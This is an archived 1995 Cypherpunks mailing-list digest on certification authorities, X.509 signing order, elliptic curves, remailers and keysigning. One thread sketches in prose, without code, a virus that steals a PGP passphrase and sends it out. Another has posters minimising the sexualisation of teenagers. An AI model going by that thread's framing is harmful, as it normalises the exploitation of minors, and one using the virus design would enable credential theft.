Message-ID: <199511260016.TAA27186@pipe4.nyc.pipeline.com>


   The AI and author-ID security programs covered in the Nov
   17 Science article are described in detail at:

   <http://www.cs.purdue.edu/coast/coast.html>


   Active Defense of a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of
      Computer Sciences, Purdue University; CSD-TR-95-008;
      1995.

   Defending a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of Computer
      Sciences, Purdue University; CSD-TR-95-022; 1995.

   Authorship Analysis: Identifying the Author of a Program
      Ivan Krsul; Department of Computer Sciences, Purdue
      University; MS Thesis; CSD-TR-94-030; 1994.








From adam at lighthouse.homeport.org  Sat Nov 25 16:53:27 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sun, 26 Nov 1995 08:53:27 +0800
Subject: crypto for porno users
In-Reply-To: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>
Message-ID: <199511260041.TAA08908@homeport.org>



Kids like Tracy Lords, who looked to be over 18 in all her movies?
(All of which are now illegal to own because she was under 18 when she
made them.)


Adam "Clearly a sicko who should be locked up for his own good."

Moroni wrote:

|    I'm soory but I don't care if the images come from mars . Jerking off 
| to the images of kids is sick.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From chen at intuit.com  Sat Nov 25 18:26:44 1995
From: chen at intuit.com (Mark Chen)
Date: Sun, 26 Nov 1995 10:26:44 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511252105.QAA08724@homeport.org>
Message-ID: <9511260216.AA23306@doom.intuit.com>



> | C) Don't settle for less than X.509 ver 3, because this allows the 
> | certificate to carry within it a reference to the location of the CRL 
> | list.  Use that feature.
> 
> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

I don't believe that it does.

For those who missed it, the problem is that the encryptor in an
encrypt-before-signing protocol is able to use his knowledge of the
factorization of the encryption modulus to compute a discrete log, and
forge another message for which the signature is also valid (after
registering the new exponent).

   - Mark -



--
Mark Chen 
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D





From jimbell at pacifier.com  Sat Nov 25 18:41:05 1995
From: jimbell at pacifier.com (jimbell at pacifier.com)
Date: Sun, 26 Nov 1995 10:41:05 +0800
Subject: No Subject
Message-ID: <9511260232.AB20127@toad.com>


>From POP3 at abaco.coastalnet.com. Sat Nov 25 21:32:38 1995
Return-Path: <dkincaid at home.dave.us>
Received: from home.dave.us (pm-nb1-49.coastalnet.com) by abaco.coastalnet.com (4.1/SMI-4.1)
	id AA03138; Sat, 25 Nov 95 21:30:18 EST
Resent-Date: Sat, 25 Nov 1995 17:00:16 -0800
Resent-From: dkincaid at home.dave.us
Resent-Message-Id: <9511260230.AA03138 at abaco.coastalnet.com>
Received: by home.dave.us id AA01536
  (5.67b/IDA-1.5 for cn1290 at coastalnet.com); Sat, 25 Nov 1995 21:27:17 -0500
Resent-To: cn1290 at coastalnet.com
Message-Id: <m0tJUWY-0008yoC at pacifier.com>
X-Sender: jimbell at pacifier.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Precedence: bulk
Sender: jimbell at pacifier.com (jim bell)
From: jimbell at pacifier.com (jim bell)
To: cypherpunks at toad.com
Cc: vznuri at netcom.com
Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
Date: Sat, 25 Nov 1995 17:00:16 -0800

The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri at netcom.com>
>From: jimbell at pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
away with you tail between your legs!
>
>Stop being a wuss!  If you're as correct as  you claim you are, you have no
reason to fear.  Debate, dammit!
>








From aleph at toad.com  Sat Nov 25 18:42:47 1995
From: aleph at toad.com (aleph at toad.com)
Date: Sun, 26 Nov 1995 10:42:47 +0800
Subject: No Subject
Message-ID: <9511260232.AA20127@toad.com>


>From POP3 at abaco.coastalnet.com. Sat Nov 25 21:32:39 1995
Return-Path: <dkincaid at home.dave.us>
Received: from home.dave.us (pm-nb1-49.coastalnet.com) by abaco.coastalnet.com (4.1/SMI-4.1)
	id AA03139; Sat, 25 Nov 95 21:30:20 EST
Resent-Date: Sat, 25 Nov 1995 00:02:29 -0600 (CST)
Resent-From: dkincaid at home.dave.us
Resent-Message-Id: <9511260230.AA03139 at abaco.coastalnet.com>
Received: by home.dave.us id AA01530
  (5.67b/IDA-1.5 for cn1290 at coastalnet.com); Sat, 25 Nov 1995 21:26:44 -0500
Resent-To: cn1290 at coastalnet.com
Message-Id: <Pine.SUN.3.91.951124235921.16448A at dfw.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Precedence: bulk
Sender: Aleph One <aleph1 at dfw.net>
From: Aleph One <aleph1 at dfw.net>
To: cypherpunks at toad.com
Subject: Cypherpunk Certification Authority
Date: Sat, 25 Nov 1995 00:02:29 -0600 (CST)

	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
of the respected member in the group such as Sammer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 








From norm at mediacity.com  Sat Nov 25 21:58:57 1995
From: norm at mediacity.com (Norman Hardy)
Date: Sun, 26 Nov 1995 13:58:57 +0800
Subject: Learning about Elliptic Curves
Message-ID: <acddae750002100481c8@DialupEudora>


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crpto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i after 0 such that a_0 =
a_i. Knowing the period is tantamount to knowing the private key.







From EALLENSMITH at ocelot.Rutgers.EDU  Sat Nov 25 22:24:00 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Sun, 26 Nov 1995 14:24:00 +0800
Subject: crypto for porno users
Message-ID: <01HY2X8H88VK8WYKBT@mbcl.rutgers.edu>


From:	IN%"moroni at scranton.com"  "Moroni" 25-NOV-1995 16:21:44.10

   I'm soory but I don't care if the images come from mars . Jerking off 
to the images of kids is sick.
----------------------------
	That's your opinion, and thus your problem to be dealt with by you.
Yes, I'm calling that a _problem_. If it makes you want to harm others who
aren't harming anyone else, then it's a problem.
	I also have my doubts as to whether you can honestly deny ever being
attracted by a young teenager, even as an adult. But your sexual preferences
are not my business, any more than anyone else's are of yours.
	I will refrain from posting further on cypherpunks about this, since
it's getting far from the purpose of the list. Feel free to reply in private
email.
	-Allen





From saken at chardos.connix.com  Sat Nov 25 22:56:59 1995
From: saken at chardos.connix.com (Scott Kenney)
Date: Sun, 26 Nov 1995 14:56:59 +0800
Subject: REPOST: Amnesia Remailer
Message-ID: <199511260646.BAA06047@chardos.connix.com>


-----BEGIN PGP SIGNED MESSAGE-----

Excuse the repost but I was asked to do this again !MIME :)

The amnesia remailer is now available for public use:

amnesia is a combination mixmaster/type 1 remailer supporting
the following capabilities:


<amnesia.chardos.connix.com> cpunk mix pgp hash latent cut ek ksub

Encrypted: PGP  - header
##		- pasting
Latency:	- header
Cutmarks:	- header
Encrypt-Key:	- header

Due to the nature of my mail connection there is an automatic variable
latency of 0-180 minutes. The reordering pool is set to 5 presently.

amnesia is currently running the following software:

Lance Cottrell's Mixmaster v.2.0.3beta6
Lance Cottrell's Reordering package.
John Fleming's  Freedom Remailer v.1.00 (upgrading to 1.6beta soon)

Hopefully USENET posting capability will be added soon.

The remailer keys are attached.

Scott Kenney


=-=-=-=-=-=-=-=-=-=-=-=
amnesia amnesia at chardos.connix.com e320fd79c4c229decabe4d486bd84394 2.0.2

- -----Begin Mix Key-----
e320fd79c4c229decabe4d486bd84394
258
AASlry72N9LH8PxZ2oyfETBsL/BTgi9XAVnRJ/61
poZOwA+JJ7hmok+3PCjRJyyT+e8zbzxKIcYoJneP
8alFIy/YHhFbzBHwqfRnakULVGdAKhonR4M2lqNc
VWO+uiFdCxafVe0ZONjFQIrcr1EUS5bIQEBpf+fz
3wVkzzQ+ifOITwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzB86y8AAAEEAKEWFiS8DqxtyTacR9DOIcRqpRTkxdlq6UY4FxBzy16C0N3S
dspQkwAQR5dDQqZ2JSRJ6m+iE0l+3OohZn44xMj/cbKUDFQon3Vh6vCBVvABPc1N
aY1X9x9H7FzPOWsc4pivVbzJB3luw6+gzZ2zYAN/nX0oi9LoCrM8PpA8rdoFAAUR
tDhBbW5lc2lhIFJlbWFpbGVyIFR5cGUgSSBLZXkgPGFtbmVzaWFAY2hhcmRvcy5j
b25uaXguY29tPokAlQMFEDCB9D2zPD6QPK3aBQEB+6sEAIL/OtuErDiVpOqRARQQ
I0yWWTU1tyT11Bl+Kmx1Sf5p1JyE2Z6bt3tPLflDyek2NY42tNV0k8cbig4Q9kvP
5GwCUcKRexiWVJFUpF6FABL2wZZMltt7nMmtxRwxw+LsMra7dYhPSaYewNNHKQ7C
xcYKPxTg5HkCg7leqtEp2H9p
=6+JZ
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLgNDZQgY7wl3Gh1AQGUVQQA05aN+xx4sVVohysVN8xrvsvc5KxP/82y
sLUHCerLEsKH2EHnb1mcoT8Ayu+nrp+0YU+/di2QNF+AMMONhP/J0OQJt7odqbFM
ZgxUmyX9ya1UnRmZDiTEubGsUWeOMt9IZoeLryzMgYcB9502GpvMZWp8r6YFW5vN
nEphpRRncWY=
=Abso
-----END PGP SIGNATURE-----





From jpb at miamisci.org  Sat Nov 25 23:21:39 1995
From: jpb at miamisci.org (Joe Block)
Date: Sun, 26 Nov 1995 15:21:39 +0800
Subject: So. FL Cypherpunks Keysigning/Party
Message-ID: <v01520c09acddba0b349f@[199.227.2.170]>


-----BEGIN PGP SIGNED MESSAGE-----

Jim Ray (liberty at gate.net) announced a South Florida Cypherpunks meeting
for the night of Wednesday, November 29th at the Abbey Brewing Company on
South beach.

>Location:
>The Abbey Brewing Company  (305) 538-8110
>1115 16th Street, Miami Beach
>
>Directions:
>[From North: Take I-95 South to 195 exit, over to the beach, and go South
>on Alton Road. Look for a green sign that says "BAR" atop the building.]
>[From South: Take I-95 North to 395 exit, over to the beach, and go North
>on Alton Road. Look for a green sign that says "BAR" atop the building.]

I am proposing that all cypherpunks planning on attending the meeting email
me their PGP key fingerprint between now and noon on the 29th.  I'll
collate them and print enough copies of the fingerprint checklist for all
who've announced that they're planning to attend.  At the meeting, you can
verify (or not, not my business, really) the fingerprints with the other
attendees.  Afterwards, we'll exchange keys via email and sign them at home
and mail them back to their owners.  I'll set up an email list so that each
person can email out their key once they've merged all the signatures.

Suggestions as to how to streamline this process are welcome.

For more information on the meeting, contact Jim at liberty at gate.net

Joe Block <jpb at miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLgL5WGnwFiC3O2NAQHxwAgAu6kSVBfEwBYGwNaYbw5OOjNxP6j49T5F
h2z7WIKhehq94yiT+WhyijMscCqlGUTsBp3aDVFYY9n2/ONXr+MyGIMoTst0dvsv
dXhuguIcBTuvImTddGA4MNZG7eUibO/r98BPJlF9iRfHTwpCOXOsNJGit+ONSB++
Cy8xgAFUiAUaOvNbi63pTnELoyCmBvFqhROqspeUmRGYYHZj4w3DF3nEH+XED31K
vVx7FFpejIeBBfhk72T7vL0L+cu17R4uIhOgmqUmHIw7k7rmLxf+z7f7fNAwQpPi
yjEsyXPtKwENXV2kRSc12O8XjwNoKiQBfuGBDpSfqbev4fkwoMuoyA==
=z9sP
-----END PGP SIGNATURE-----

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf







From jamesd at echeque.com  Sat Nov 25 23:43:48 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 26 Nov 1995 15:43:48 +0800
Subject: crypto for porno users
Message-ID: <199511260734.XAA14199@blob.best.net>


At 05:14 PM 11/25/95 -0500, Moroni wrote:
>
>   I'm soory but I don't care if the images come from mars . Jerking off 
>to the images of kids is sick.

An image of a sixteen year old girl masturbating is classified 
as child pornography in American law:  Think about how old 
you were when you first engaged in sexual acts.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From ddt at lsd.com  Sun Nov 26 00:46:58 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Sun, 26 Nov 1995 16:46:58 +0800
Subject: [FYI] FBI Training Eastern European Police
Message-ID: <v03003e03acddb4a8d772@[129.46.82.80]>


[ from: The Hungary Report #1.28, free weekly, direct from Budapest ]
[ retransmitted to list without permission to increase distribution ]

  FBI School Teaches New Tricks to Old Enemies

  By Susan Milligan   Copyright (c) 1995

  In matching navy blue polo shirts, the students sat transfixed as
  they watched slides showing the destruction of the Oklahoma City and
  World Trade Center bombings.

  "God forbid you should ever have anything like this happen over
  here," American instructor Ed Burwitz told his Central European
  class, outfitted with headphones for simultaneous translation of the
  lecture. "It is a tough task for any
  freedom-loving country to prevent terrorism," he added.

  The class on forensics is typical of what goes on in law enforcement
  academies across America. But in this classroom, the instructors are
  teaching crime-fighting tactics to students from onetime enemy
  nations.

  "This could not have happened five years ago," said Laszlo Simon, the
  Hungarian director of the International Law Enforcement Academy here.
  "We don't preach or teach," said Leslie Kaciban, the American
  director of the newly-opened facility. Instead, the American
  instructors - culled from the FBI and other law enforcement agencies
  - share information and experiences with the students for them to
  adapt to their systems.

  Students from Hungary, Russia, Poland, the Czech Republic and other
  Central and Eastern European nations attend ILEA's 8-week sessions,
  the first of which began in April.

  The United States fronted $2.5 million to renovate the campus, which
  includes a brand-new gym, classrooms, dormitories and one of
  Hungary's few indoor tennis courts. The Hungarian government
  contributed $500,000 to renovate the facility,
  but the U.S. will pay the $3.5 million yearly cost to operate the
  center, which is modeled after the law enforcement training center in
  Quantico, Va.

  The facility looks like any other college campus - students go on
  field trips together, take "wellness" physical fitness class
  together, and will have a yearbook and alumni newsletter.
  The idea is to help the Eastern Europeans with their burgeoning
  crimes problems, as well as to foster cooperation on international
  crime problems.

  "I'm amazed at the freedom of travel that is possible" after the
  opening up of the Eastern nations, Burwitz said. But "that means
  criminals can travel as well," he said, allowing them to traffic
  drugs and contraband. "The more interaction we have with these
  countries in law enforcement, the better it will be for emerging
  democracies," Kaciban said.

  Class topics range from "human dignity" - how to treat a crime
  suspect - to undercover operations and fraud. April's bombing of the
  federal building in Oklahoma City is being used as an example in
  several classes.

  In "crisis management," students will learn "how to contain it (a
  crisis) and keep it from erupting," said instructor Stephen Brooks,
  who helped handle the Oklahoma City bombing. Big-scale bombings are
  not common to this part of the world, students said. But they said
  they learned a lot about how to fight organized crime, which is
  mushrooming in the aftermath of the fall of communism. "They told
  they have a lot of problems (with organized crime), and that it's
  better if we learn from their mistakes," said Hungarian student
  Vilmos Szeplaki.

  Organized crime is doubly damaging to the emerging nations, because
  it undermines their economies, Kaciban said. Investors are naturally
  reluctant to dump money into a nation if they believe there is
  rampant corruption. Some teachings do not translate for the European
  students. For example, there is no Russian RICO - the Racketeer
  Influenced and Corrupt Organizations Act that is one of the strongest
  American legal tools against organized crime.

  Eastern European crime syndicates tend not to be based in crime
  families, instructors said. And organized crime in Russia and Ukraine
  is so much a part of the society, that it's hard to stop it, said Amy
  O'Neil, a State Department official not involved in the ILEA. "Under
  the communist system, you basically did what you could get away with.
  Everyone broke laws," O'Neil said. "That's how you survived."

  Both students and teachers said there was a remarkable similarity,
  however, in the use of evidence and investigatory tools among the
  countries. Eastern Europeans are very familiar with the use of DNA
  testing, for example, to identify suspects, although they don't
  always have the money to do it, Burwitzsaid."There are different
  orders of laws between the U.S. and here," said a Czech student who
  would identify himself only as Milan. "But essentially, we have the
  same methods of investigation."

                                                * * *
  Susan Milligan <susan.milligan at magnet.hu> is a free-lance writer and
  stringer for the Boston Globe, the San Francisco Examiner, Business
  Central Europe and Hollywood Reporter.







From anonymous-remailer at shell.portal.com  Sun Nov 26 01:51:31 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 26 Nov 1995 17:51:31 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511260942.BAA09733@jobe.shell.portal.com>


On Sat, 25 Nov 1995, Aleph One wrote:

> On Sat, 25 Nov 1995, Perry E. Metzger wrote:
> 
> > Hmmm. If someone is willing to find out what is needed to become a
> > C.A. and to run one, and it turns out not to be particularly onerous,
> > I or one of my corporate alter egos might be willing. I must say,
> > though, that being an anti-fan of X.509 the situation would be ironic...
> > 
> > Perry
> 
> Well from Netscape perspetive as far as I know you need nothing. Basicly
> when the browser finds a new CA that it does know about it promts
> the user and through a series of dialog boxes the user chooses to trust
> it or not.

Gee, wasn't that clever of Netscape??

Lilies that fester smell worse than weeds ... people should remember that.
(I think Shakespeare first wrote that in one of his sonnets ...)

> (Well that is theory, and what netscape release notes say, since
> I dont have access to an SSL server right now, and would need to figure
> out how to make my own certificate, I havent tried it).

Bingo.  *theory* ... right ... I mean what would be the point??

Installing Netscape degrades your inherent system security.  No ifs, 
ands, or buts.

Netscape Navigator basically destroys whatever sense of privacy or
security, any person ever had the illusion of having.  And that pretty 
well rules out CA.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From anonymous-remailer at shell.portal.com  Sun Nov 26 02:00:44 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 26 Nov 1995 18:00:44 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511260953.BAA10105@jobe.shell.portal.com>


On Sat, 25 Nov 1995, Adam Shostack wrote:

> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)
> 
> 	Its an excellent paper, well worth reading, but the basic
> problem is that X.509 encrypts before signing.

You'd rather sign before encryption??

Doesn't that give you "known plain-text" to attack?  i.e. the signature.

I'm not sure whether it would or wouldn't, but I'm sure some
cryptographers here might clear that up mighty quick -- before any more
harm is allowed, I mean. 

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From jya at pipeline.com  Sun Nov 26 07:19:21 1995
From: jya at pipeline.com (John Young)
Date: Sun, 26 Nov 1995 23:19:21 +0800
Subject: BOS_nya
Message-ID: <199511261508.KAA17650@pipe4.nyc.pipeline.com>


   11-26-95. Washrag:

   "Seeking the Government That Governs Best." Book review.

      What Comes Next:
      The End of Big Government And the New Paradigm Ahead
      By James P. Pinkerton
      Hyperion. 404 pp. $24.95

      In Pinkerton's account, bureaucracy survives today only
      because no one has yet developed a coherent replacement
      model." Instead we have deluded ourselves into thinking
      that periodic upgrading of what Pinkerton calls the
      "Bureaucratic Operating System" (BOS) -- in the same way
      that computer software is upgraded -- will enable us to
      avoid the gloomy prospect of life in the "Cyber Future,"
      his term for the horrific predicament of extreme
      inequality and hypercrime to which we are headed.

      At one point Pinkerton suggests that a parallel for Bill
      Clinton may be found in Mikhail Gorbachev. Both leaders
      "shrank from genuine perestroika" after their peoples
      had come to the realization that the system itself was
      the problem.

      Displaying a sure grasp of popular culture, technology
      and political history, Pinkerton writes engagingly and
      insightfully about the defects and malfunctionings of
      the American bureaucratic state. His refreshing analyses
      of the flaws in bureaucratic thinking are among the best
      that we have on the subject and, surely, the wittiest.

   BOS_nya  (7 kb)













From mark at unicorn.com  Sun Nov 26 07:52:52 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Sun, 26 Nov 1995 23:52:52 +0800
Subject: [NOISE] Re: crypto for porno users
Message-ID: <Pine.3.89.9511261505.A2182-0100000@unicorn.com>



On Fri, 24 Nov 1995, E. ALLEN SMITH wrote:

> consent. For instance, Britain's age for consent depends on the
> type of sexuality involved; heterosexual sex receives a more
> lenient age (18) than homosexual (21).

This is getting distinctly off-topic, but Britain's age of consent is
actually 16 for heterosexual sex, 18 for male homosexuals (unless the
government have changed it back again, they reduced it from 21 a few
months ago), and I think 16 for lesbians. But it's all terribly
complicated, as you pointed out... 

Incidentally, the "Sun" newspaper, one of the most popular in the UK
(sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
half-page erotic pictures of topless sixteen-year-old girls. Would this be
"kiddie porn"  in the US ?

OBCrypto: Did anyone ever find out which version of A5 is in Applied 
Cryptography ?

	Mark






From jhupp at novellnet.gensys.com  Sun Nov 26 08:54:14 1995
From: jhupp at novellnet.gensys.com (Jeff Hupp)
Date: Mon, 27 Nov 1995 00:54:14 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <20439E87AE1@Novellnet.Gensys.com>


On 25 Nov 95 at 15:35, Alex Strasheim wrote:

: > Basicly when the browser finds a new CA that it does know about it promts
: > the user and through a series of dialog boxes the user chooses to trust it
: > or not. 
: 
: Is anyone running an ssl web server that would let us see how this works?
: 
: 
	A 'how to' on rolling your own can be found at:
		http://fiasco.snre.umich.edu/~altitude/ssl/ssl.saga.html

	While that one is using a certificate from VaraSign, as mentioned 
earlier you can create your own authority and certificate  with tools you find at:
		http://bond.edu.au/External/Misc/Crypto/

-- 
JHupp at gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp at gensys.com
The difference between science and the fuzzy subjects is that science
requires reasoning, while those other subjects merely require scholarship






From khijol!erc at uunet.uu.net  Sun Nov 26 10:09:00 1995
From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin])
Date: Mon, 27 Nov 1995 02:09:00 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511260942.BAA09733@jobe.shell.portal.com>
Message-ID: <199511261854.MAA08675@khijol>


-----BEGIN PGP SIGNED MESSAGE-----

> > (Well that is theory, and what netscape release notes say, since
> > I dont have access to an SSL server right now, and would need to figure
> > out how to make my own certificate, I havent tried it).
> 
> Bingo.  *theory* ... right ... I mean what would be the point??
> 
> Installing Netscape degrades your inherent system security.  No ifs, 
> ands, or buts.
> 
> Netscape Navigator basically destroys whatever sense of privacy or
> security, any person ever had the illusion of having.  And that pretty 
> well rules out CA.
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Is this another one of those LD tentacles? ;)
- --
Ed Carp, N7EKG    			Ed.Carp at linux.org, ecarp at netcom.com
					214/993-3935	voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLi30yS9AwzY9LDxAQFZTwP/fyisNS+8UlleOpy4+mo8lxD6i7bq3sdP
I80XfihTenRayNPj+eVHBfciSrfSXWbSaScGi5MVUILfShDd71E0mxCimvfXpey6
hHQc2gyMCAuHN5ZswXBKrOry23dzIgNrwfLlnbMoGoUQro2Z/Cg/b9YOy4qaGMer
Gido6n71Npc=
=MN40
-----END PGP SIGNATURE-----





From jamesd at echeque.com  Sun Nov 26 11:30:01 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 27 Nov 1995 03:30:01 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511261922.LAA16753@blob.best.net>


At 01:53 AM 11/26/95 -0800, anonymous-remailer at shell.portal.com wrote:
>You'd rather sign before encryption??
>
>Doesn't that give you "known plain-text" to attack?

The signature is not known unless the whole message being signed is
known.

And any encryption scheme that is vulnerable to known plaintext attack
where only a part of the message is known, is worthless anyway.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From zerucha at shell.portal.com  Sun Nov 26 11:54:03 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Mon, 27 Nov 1995 03:54:03 +0800
Subject: Virus attacks on PGP
In-Reply-To: <acdc55c10202100472f8@DialupEudora>
Message-ID: <Pine.SUN.3.90.951126111730.22642A-100000@jobe.shell.portal.com>


On Fri, 24 Nov 1995, Norman Hardy wrote:

> At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
> ....
> 
> >It takes quite an effort to create a complex virus to do this.  It
> >reminds me of the Glomar Challenger that was used to recover the remains
> >of a russian sub (my memory is somewhat faulty).  Such a virus would
> >require a great investment in time and money.  What target would be worth it?
> >Many otherwise feasible things aren't economically pracitcal.
> 
> Yes, but if your particular habits became widespread, an intelligence
> agency could amortize the virus effort across many victims.
> 
> Here is just one such complicated virus:
> Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
> patch writes to disk the location and password for the secure key ring.
> Concurrently the virus watches for there to be IP service and sends the
> disk information as a UDP.

The virus is starting to get large and noticeable.  First, I alternate 
between a.out and ELF (and DOS .EXE). It doesn't have to patch pgp, just 
look for it to be loaded and teh secring file accessed.  Then record 
keystrokes.  This would also work with a hardware implementation if the 
secring passphrase is external (as opposed to an external keypad).

This is what can be done when PGP is used for communication.  For other 
info, I can isolate a computer (no modem, unroutable IP addresses, etc).

Of course our firewall is a socks server and doesn't forward UDP.  Maybe 
a socksified, SSL virus?  My computer is attatched that way far more than 
via modem.  And maybe I should just nuke (or modularize) UDP?  You can do 
interesting things with kernel source.

> Alternatively the virus waits for idle time, (screen saver time) and dials
> an 800 number having turned off the modem speaker. But don't send the same
> data twice!

That woudl be interesting - even with the speaker "off" the power surge 
causes clicking and other signs.  Not to mention that the interrupt count 
would start moving (of course the virus could replace the entire OS and 
would only have to find 300K chunks to hide in).

Were they that interested, they could place a surveillence device over my 
desk (I don't know if they can pick up the scan on LCDs like they can on 
monitors - I am suprised they didn't put the kybosh to the FCC emission 
rules).  Maybe I can move my desk, or my pgp station inside our EMI 
testing faraday cage :).

zerucha at shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha at jobe.portal.com for PGP key






From jamesd at echeque.com  Sun Nov 26 12:09:56 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 27 Nov 1995 04:09:56 +0800
Subject: [NOISE] Re: crypto for porno users
Message-ID: <199511262001.MAA19515@blob.best.net>


At 03:42 PM 11/26/95 +0000, Rev. Mark Grant wrote:
> Incidentally, the "Sun" newspaper, one of the most popular in the UK
> (sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
> half-page erotic pictures of topless sixteen-year-old girls. Would this be
> "kiddie porn"  in the US ?

Yes

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Sun Nov 26 12:17:09 1995
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 27 Nov 1995 04:17:09 +0800
Subject: Elliptic curves, current status?
Message-ID: <199511262008.MAA20100@blob.best.net>


I have read:

That public key cryptography using elliptic curves is much 
faster than using integers, for comparable security.

That public key cryptography using elliptic curves is much 
slower than using integers, for comparable security.

That the numbers required have many more bits.

That the numbers required have somewhat less bits.

